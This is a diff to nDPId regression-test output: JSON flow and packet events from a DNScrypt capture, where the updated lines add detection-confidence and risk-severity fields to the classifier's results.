 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":373,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318169,"flow_last_seen":946739318169,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739318169,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":49115,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01137{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":1,"flow_last_seen":946739318169,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739318169,"pkt":"REREREREZmZmZmZmCABFAAIcuopAAL0Rw14KAAABwb+7a7\/bAbsCCEABLykBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJiZQAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00685{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":373,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318169,"flow_last_seen":946739318169,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739318169,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":49115,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":373,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318169,"flow_last_seen":946739318169,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739318169,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":49115,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00705{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":2,"flow_last_seen":946739318170,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"ts_msec":946739318170,"pkt":"ZmZmZmZmRERERERECABFAADWEfMAADQRWDSOBM0vCgAAAQG7nMoAwrdpqlqBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANuczQCY2EFbHVnZ3MCY28AABAAAcAMABAAAQAAAAAAfXxETlNDAAEAAAVJsH+RdJNH3D0PM7heo\/dPPI3i1+4vLX8T10ivxa\/CqjJyTHnmZoOX4oJMyJ42Khrgw6i1Ft4Vh\/Rb2U7RsAXZ5P9pZAltiMSwIbLDTpLjw5sG+xMI0gbdPS4ze+O\/Bdnk\/2lkCW2IWX62bll+tm5sSrlu"}
 00705{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":2,"flow_last_seen":946739318171,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"ts_msec":946739318171,"pkt":"ZmZmZmZmRERERERECABFAADWEfIAADQRWDWOBM0vCgAAAQG701AAwoDiqluBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANuczQCY2EFbHVnZ3MCY28AABAAAcAMABAAAQAAAAAAfXxETlNDAAEAAAVJsH+RdJNH3D0PM7heo\/dPPI3i1+4vLX8T10ivxa\/CqjJyTHnmZoOX4oJMyJ42Khrgw6i1Ft4Vh\/Rb2U7RsAXZ5P9pZAltiMSwIbLDTpLjw5sG+xMI0gbdPS4ze+O\/Bdnk\/2lkCW2IWX62bll+tm5sSrlu"}
 00705{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":376,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":2,"flow_last_seen":946739318175,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"ts_msec":946739318175,"pkt":"ZmZmZmZmRERERERECABFAADWEfQAADQRWDOOBM0vCgAAAQG7jD8Awsf2qliBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANuczQCY2EFbHVnZ3MCY28AABAAAcAMABAAAQAAAAAAfXxETlNDAAEAAAVJsH+RdJNH3D0PM7heo\/dPPI3i1+4vLX8T10ivxa\/CqjJyTHnmZoOX4oJMyJ42Khrgw6i1Ft4Vh\/Rb2U7RsAXZ5P9pZAltiMSwIbLDTpLjw5sG+xMI0gbdPS4ze+O\/Bdnk\/2lkCW2IWX62bll+tm5sSrlu"}
@@ -779,55 +779,55 @@
 00699{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":382,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":2,"flow_last_seen":946739318205,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"ts_msec":946739318205,"pkt":"ZmZmZmZmRERERERECABFAADSHklAADYR5+rBv7trCgAAAQG7v5AAvjUmLyiBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJiZQAAEAABwAwAEAABAABwgAB9fEROU0MAAgAAzGGkyIiowp8pFszsXxkEW0y0qS06At4miIE7AyLIdZ2u5Jf0Kd+gqa\/ZnKsGDqB9\/JqMQzB5mxntdDH0TQRsCBpBtMbo6VmIyWnkxOdJSeZWPK9K\/gWr4WDPFo1HWxdqGkG0xujpWYgAAAABX1Oe6F9U8Gg="}
 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":383,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":45375,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01137{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":383,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":1,"flow_last_seen":946739337048,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739337048,"pkt":"REREREREZmZmZmZmCABFAAIc+LxAAL0RUngKAAABMw980LE\/EPcCCHK1aUUBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA9hbXMtZG5zY3J5cHQtbmwAABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":383,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":45375,"dst_port":4343,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":383,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":45375,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":384,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":49975,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":1,"flow_last_seen":946739337048,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739337048,"pkt":"REREREREZmZmZmZmCABFAAXc+L0gAL0RbrcKAAABMw980MM3EPcGBKwyaUIBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA9hbXMtZG5zY3J5cHQtbmwAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":384,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":49975,"dst_port":4343,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":384,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":49975,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":385,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739337048,"pkt":"REREREREZmZmZmZmCABFAABQ+L0Aub0Rk4oKAAABMw980AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":385,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":386,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":38310,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":386,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":1,"flow_last_seen":946739337048,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739337048,"pkt":"REREREREZmZmZmZmCABFAAXc+L4gAL0RbrYKAAABMw980JWmEPcGBNnFaUABAAABAAAAAAABATINZG5zY3J5cHQtY2VydA9hbXMtZG5zY3J5cHQtbmwAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":38310,"dst_port":4343,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":38310,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":387,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":55768,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":387,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":1,"flow_last_seen":946739337048,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739337048,"pkt":"REREREREZmZmZmZmCABFAAIc+L9AAL0RUnUKAAABMw980NnYEPcCCHK1aUMBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA9hbXMtZG5zY3J5cHQtbmwAABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":387,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":55768,"dst_port":4343,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":387,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739337048,"flow_last_seen":946739337048,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739337048,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":55768,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
